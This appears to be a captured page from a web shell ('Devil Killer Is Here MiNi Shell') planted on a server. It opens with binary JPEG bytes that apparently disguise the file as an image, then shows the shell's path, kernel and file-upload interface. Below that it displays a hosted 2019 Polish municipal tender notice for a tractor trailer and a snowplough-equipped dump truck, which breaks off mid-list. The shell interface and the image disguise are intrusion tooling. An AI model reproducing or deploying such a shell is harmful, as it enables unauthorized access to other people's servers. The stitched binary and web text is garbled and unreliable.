JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190308/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190308/523034-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 523034-N-2019 z dnia 2019-03-08 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Burmistrz Ryglic</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa fabrycznie nowego sprzętu dla Gminy Ryglice: Część I: Dostawa fabrycznie nowej przyczepy o ładowność 8 ton do ciągnika rolniczego Część II: Dostawa fabrycznie nowego samochodu ciężarowego typu wywrotka wraz z dodatkowym osprzętem, tj. nową piaskarką i pługiem do odśnieżania</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Burmistrz Ryglic</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">54758900000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Rynek</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">9</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">33-160</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Ryglice</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">małopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">146 541 035</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">inwest_ryglice@poczta.onet.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">146 541 054</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.ryglice.pl </span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">https://bip.malopolska.pl/umryglice/</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">https://bip.malopolska.pl/umryglice/</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Oferty należy złożyć w formie pisemnej, zgodnie z wymaganiami opisanymi w SIWZ. </span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Miejski w Ryglicach, ul. Rynek 9, 33-160 Ryglice</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa fabrycznie nowego sprzętu dla Gminy Ryglice: Część I: Dostawa fabrycznie nowej przyczepy o ładowność 8 ton do ciągnika rolniczego Część II: Dostawa fabrycznie nowego samochodu ciężarowego typu wywrotka wraz z dodatkowym osprzętem, tj. nową piaskarką i pługiem do odśnieżania</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.271.1.8.2019 </span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest dostawa fabrycznie nowego sprzętu dla Gminy Ryglice, w tym przyczepy o ładowność 8 ton do ciągnika rolniczego oraz samochodu ciężarowego typu wywrotka wraz z dodatkowym osprzętem, tj. nową piaskarką i pługiem do odśnieżania. Zamawiający dopuszcza składanie ofert częściowych, w podziale na następujące części:- Część I: ,,Dostawa fabrycznie nowej przyczepy o ładowność 8 ton do ciągnika rolniczego",- Część II: ,,Dostawa fabrycznie nowego samochodu ciężarowego typu wywrotka wraz z dodatkowym osprzętem, tj. nową piaskarką i pługiem do odśnieżania". Szczegółowy opis przedmiotu zamówienia:Część I. ,,Dostawa fabrycznie nowej przyczepy o ładowność 8 ton do ciągnika rolniczego":Przedmiotem zamówienia jest dostawa przyczepy o ładowności 8 ton, fabrycznie nowej, rok produkcji 2018 lub 2019 o następujących parametrach technicznych:1)	Dwie osie.2)	Wywrót trójstronny.3)	Przystosowana do współpracy z ciągnikiem rolniczym.4)	Dopuszczalna masa całkowita maksimum 11 000 kg.5)	Ładowność 8 000 kg.6)	Długość skrzyni załadunkowej min. 4 200 mm.7)	Szerokość skrzyni załadunkowej - trapez: min. 2 150/2 200 mm.8)	Wysokość ścian skrzyni min. 500 mm.9)	Grubość blachy podłogi min. 4 mm.10) Wysokość platformy od podłoża maksimum 1 250 mm.11) Centralny system ryglowania ścian.12) Linka spinająca ściany.13) Sprężyny wspomagające otwieranie ścian bocznych.14) Drabinka, dyszel typu V z zaczepem sztywnym, oko zaczepu ? 40 mm.15) Instalacja hamulcowa pneumatyczna dwuprzewodowa.16) Instalacja hamulcowa hydrauliczna.17) Postojowy hamulec ręczny z korbą.18) Instalacja oświetlenia 12V spełniająca wymogi ruchu drogowego.19) Tylne lampy oświetleniowe z kratkami zabezpieczającymi przed uszkodzeniem.20) Hydrauliczna stopa podporowa.21) Ogumienie nie mniejsze niż 400/60-15,5.22) Dwa kliny pod koła.23) Koło zapasowe mocowane pod podłogą.24) Plandeka ze stelażem.25) Przyczepa przystosowany do zespolenia z drugą przyczepą - zaczep tylny oraz układ hydrauliczny, hamulcowy i elektryczny do następnej przyczepy.26) Trójkąt wyróżniający pojazdy wolno poruszające się.27) Najazdy aluminiowe o szerokości min. 50 cm, długości min. 4 m, udźwigu min. 6 500 kg.28) Najazdy ze standardowym typem mocowania - płetwą.29) Najazdy powinny spełniać wszelkie normy wytrzymałościowe, tj. posiadać certyfikat TUV będący gwarancją jakości.30) Podpory stabilizujące pod najazdy.31) Przyczepa posiada certyfikat CE, świadectwo homologacji.Pozostałe wymogi zamówienia:1)	Wymagany okres gwarancji min. 24 m-ce liczone od daty podpisania protokołu odbioru końcowego.2)	Wykonawca zapewnia serwis gwarancyjny i pogwarancyjny z czasem reakcji serwisu do 2 dni roboczych od momentu zgłoszenia usterki.3)	Dostawa przyczepy do siedziby Zamawiającego.4) Komplet dokumentów do rejestracji na terytorium Rzeczpospolitej Polskiej.5)	Termin dostawy - maksymalnie do 21 dni od daty zawarcia umowy.Część II. ,,Dostawa fabrycznie nowego samochodu ciężarowego typu wywrotka wraz z dodatkowym osprzętem, tj. nową piaskarką i pługiem do odśnieżania". Przedmiotem zamówienia jest dostawa fabrycznie nowego samochodu ciężarowego typu wywrotka, wraz z dodatkowym osprzętem, tj. nową piaskarką i pługiem do odśnieżania:1)	Fabrycznie nowy samochód ciężarowy, rok produkcji: 2018 lub 2019, musi posiadać certyfikat zgodności z normami CE i być dopuszczony do ruchu na terytorium Rzeczpospolitej Polskiej.2)	Podwozie dwuosiowe, układ napędowy 4x4, przystosowane do montażu zabudowy samowyładowczej typ 3W.3)	Dopuszczalna całkowita masa pojazdu maksymalnie 16 000 kg.4)	Silnik o mocy min 280 KM, maksimum 320 KM oraz pojemność od 8 000 cm3 do 10 000 cm3, spełniający normę emisji spalin minimum EURO 6 doładowany turbosprężarką o zmiennej geometrii.5)	Silnik 6-cio cylindrowy wysokoprężny.6)	Skrzynia biegów manualna, synchronizowana.7)	Skrzynia rozdzielcza pracująca w sposób ciągły w układzie 4x4, z między mostowym mechanizmem różnicowym, osłoniętym osłoną stalową.8)	Most napędowy z przełożeniem bezpośrednim i blokadą mechanizmu różnicowego.9)	Elektropneumatyczne sterowanie przełożeniami i blokadą między mostową.10) Przystawka odbioru mocy.11) Przystawka odbioru mocy (PTO) dopasowana do zabudowy wraz z oprogramowaniem fabrycznym.12) Przystawka odbioru mocy od skrzyni biegów do napędu hydrauliki wywrotu.13) Podwozie samochodu ciężarowego przystosowane do pracy w zimnych warunkach klimatycznych, przy temperaturach spadających poniżej -12 stopni Celsjusza.14) Prześwit - przód z obciążnikiem - nie mniej niż 315 cm.15) Prześwit - tył z obciążnikiem - nie mniej niż 300 cm.16) Przednie zawieszenie wyposażone w paraboliczne resory ze stabilizatorem.17) Oś tylna - zawieszenie pneumatyczne.18) Hamulec silnikowy (wydechowy).19) Układ hamulcowy dwuobwodowy - hamulce bębnowe.20) Hamulec ręczny sterowany pneumatycznie.21) Instalacja hydrauliczna, pneumatyczna i elektryczna 24 V.22) Gniazda 12V i 24V w kabinie.23) Główny włącznik prądu na zewnątrz samochodu.24) Kabina 3 - osobowa, siedzenie 2 - osobowe (2 - miejscowa ławka) ze schowkiem zamykanym.25) Fotel kierowcy pneumatyczny, wszystkie fotele z zagłówkiem i pasami bezpieczeństwa.26) Poduszka powietrzna dla kierowcy.27) Układ kierowniczy lewostronny, z regulowaną kolumną kierowniczą.28) Kabina klimatyzowana.29) Tylna ściana kabiny z oknem.30) Dwa podgrzewane lusterka wsteczne, regulowane elektrycznie.31) Dwa lusterka szerokokątne, lusterko rampowe, lusterko przed szybą przednią (dojazdowe przednie) - zgodnie z wymogami UE.32) Ogrzewana szyba przednia z osłoną przeciwsłoneczną.33) Szyby boczne sterowane elektrycznie.34) Komputer pokładowy z menu w języku polskim.35) Zderzak stalowy.36) Światło ostrzegawcze umieszczone nad kabiną pojazdu (lampa zespolona z napisem podświetlanym ,,GMINA RYGLICE" - kolor światła żółty).37) Tylna lampa przeciwmgielna. Halogen oświetlenie pola pracy z tyłu pojazdu.38) Reflektory i lampy osłonięte siatką ochronną, umieszczone na wysokości uwzględniającej pracę z pługiem czołowym.39) Osłony tylnych świateł (uchylne kratki).40) Elektroniczny ogranicznik prędkości.41) Zbiornik paliwa o pojemności nie mniejszej niż 200 litrów.42) Zbiornik płynu AdBlue.43) System ABS.44) System EBS.45) Wskaźnik ciśnienia w ogumieniu umieszczony na desce rozdzielczej.46) Tachograf cyfrowy.47) Dźwiękowy sygnał biegu wstecznego.48) Zamek centralny z pilotem.49) Podwozie wyposażone w złącza elektryczne i hydrauliczne do sterowania i obsługi pługa i posypywarki.50) Płyta czołowa umożliwiająca montaż pługa odśnieżającego.51) Instalacja umożliwiająca sterowanie joystickiem z samochodu pługiem i piaskarką.52) Pojazd przystosowany do zespolenia z drugą przyczepą (układ hydrauliczny, elektryczny, pneumatyczny).53) Standardowa tabliczka znamionowa.54) Łańcuchy śniegowe na przednie koła samochodu.55) Kabina wyposażona w instalację radiową i antenową oraz radio.Zabudowa typu wywrotka trójstronna 3W:1)	Długość zabudowy ok. 5 000 mm.2)	Szerokość zabudowy ok. 2 550 mm.3)	Wysokość burt 600 mm.4)	Zabudowa zamontowana na podwoziu.5)	Podłoga stalowa zabezpieczona antykorozyjnie o podwyższonej wytrzymałości od 5,0 do 6,0 mm.6)	Burty boczne stalowe - nie dzielone, otwierane (uchylne) z zawiasami dolnymi i górnymi o podwyższonej wytrzymałości.7)	Burta tylna min. 5 mm z zawiasami górnymi i dolnymi, możliwość demontażu tylnych słupków, otwierana automatycznie podczas wywrotu, demontowalna.8)	Burta przednia zakończona małym daszkiem.9)	Plandeka rolowana umieszczona na przedniej burcie.10) Siłownik hydrauliczny podpodłogowy.11) Pompa hydrauliczna.12) Zbiornik oleju z filtrem.13) Sterowanie wywrotem z kabiny - pneumatyczne.14) Kontrolka podniesienia skrzyni na pulpicie kierowcy.15) Drabinka ułatwiająca wejście na skrzynię ładunkową na burcie przedniej - rozkładana.16) Uchwyty do mocowania posypywarki - min. 4 szt. - zamontowane w podłodze skrzyni ładunkowej.17) Zderzak składany z homologacją.18) Błotniki na koła.19) Mocowanie koła zapasowego za kabiną.20) Światła obrysowe żółte.21) Oklejenie konturowe taśmami odblaskowymi.22) Tablice wyróżniające zgodnie z obowiązującymi przepisami.23) Łopata mocowana pod podłogą.Pozostałe wymogi zamówienia:1)	Samochód powinien posiadać na wyposażeniu: apteczkę, gaśnicę, trójkąt ostrzegawczy, klin pod koła - 2 szt., dywaniki gumowe, pokrowce na siedzenia, kamizelkę odblaskową dla kierowcy, przewód do pompowania kół, podnośnik hydrauliczny dostosowany do pojazdu, skrzynkę narzędziową ze standardowymi narzędziami, koło zapasowe.2)	Kolor podwozia oraz zabudowy do uzgodnienia na etapie realizacji zamówienia.3)	Oznakowanie i oświetlenie zgodne z obowiązującymi przepisami.4)	Instrukcja obsługi i katalog części zamiennych w języku polskim zostaną dostarczone przez Wykonawcę wraz z przekazanym sprzętem. 5)	Szkolenie minimum 2 pracowników wskazanych przez Zamawiającego w miejscu i dniu dostawy pojazdu.6)	Gwarancja min. 24 miesiące na cały pojazd.7)	Serwis gwarancyjny i przeglądy okresowe w okresie gwarancji mają być świadczone w miejscu postoju samochodu nieodpłatnie, z wyjątkiem materiałów podlegających okresowej wymianie oraz kosztów dojazdu.8)	Dostawa przedmiotu zamówienia do siedziby Zamawiającego.9)	Dostawa samochodu z pełnym zbiornikiem paliwa.10)	Komplet dokumentów do rejestracji na terytorium Rzeczpospolitej Polskiej.11)	Termin realizacji: maksymalnie do 30.06.2019 roku.Piaskarka:1)	Piaskarka z hydraulicznie napędzanym przenośnikiem taśmowym.2)	Przyłącza hydrauliczne - tył i bok.3)	Skrzynia ładunkowa o pojemności 2,5 m3 wykonana ze stali z dwustronnym zabezpieczeniem antykorozyjnym.4)	Szerokość rozsypywania - od 2 m do 10 m.5)	Masa własna maszyny maksymalnie 2 000 kg.6)	Skrzynia wyposażona w sito, ruchomy obciążnik materiałów sypkich oraz w plandekę.7)	Hydraulicznie napędzany przenośnik taśmowy i talerz rozrzutnika.8)	Rynna zsypowa i talerz rozrzutnika ze stali kwasoodpornej.9)	Sterowanie automatyczne pracą piaskarki z kabiny kierowcy w zakresie: załącz, wyłącz, regulacja, gęstości oraz szerokości sypania.10)	Oświetlenie robocze i ostrzegawcze zgodnie z obowiązującymi przepisami.11) Napęd piaskarki od przystawki samochodu.12)	Posiada wymagane prawem atesty i homologacje.Pozostałe wymogi zamówienia:1)	Kolor do uzgodnienia na etapie realizacji zamówienia.2)	Instrukcja obsługi i katalog części zamiennych w języku polskim zostaną dostarczone przez Wykonawcę wraz z przekazanym sprzętem. 3)	Szkolenie minimum 2 pracowników wskazanych przez Zamawiającego w miejscu dostawy pojazdu.4)	Gwarancja min. 24 miesiące na cały sprzęt.5)	Serwis gwarancyjny w okresie gwarancji ma być świadczony w miejscu postoju piaskarki nieodpłatnie, z wyjątkiem materiałów podlegających okresowej wymianie oraz kosztów dojazdu.6) Dostawa przedmiotu zamówienia do siedziby Zamawiającego.7)	Termin realizacji: maksymalnie do 30.06.2019 rok.Pług do odśnieżania:1)	Szerokość robocza - minimum 2600mm, maksimum 3000mm.2)	